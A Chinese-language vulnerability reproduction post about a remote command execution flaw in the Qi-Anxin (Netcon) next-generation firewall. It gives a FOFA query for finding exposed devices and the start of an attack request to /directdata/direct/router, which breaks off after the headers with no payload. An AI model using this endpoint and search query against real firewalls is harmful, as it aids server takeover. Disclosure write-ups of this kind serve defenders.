文章目录
-
-
- 漏洞描述
- 漏洞影响
- FOFA
- 漏洞复现
-
- 第一步 登录页面如下
- 第二步 发送如下请求包
- 第三步 再请求获取命令执行结果
- 漏洞复现poc
- 摘抄
-
漏洞描述
- 奇安信 网康下一代防火墙存在远程命令执行,通过漏洞攻击者可以获取服务器权限
漏洞影响
- 奇安信 网康下一代防火墙
FOFA
app="网康科技-下一代防火墙"
漏洞复现
第一步 登录页面如下
第二步 发送如下请求包
POST /directdata/direct/router HTTP/1.1
Host: ip
Sec-Ch-Ua: "Chromium";v="89", ";Not A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
发布者:admin,转转请注明出处:http://www.yc00.com/web/1754733470a5196537.html
评论列表(0条)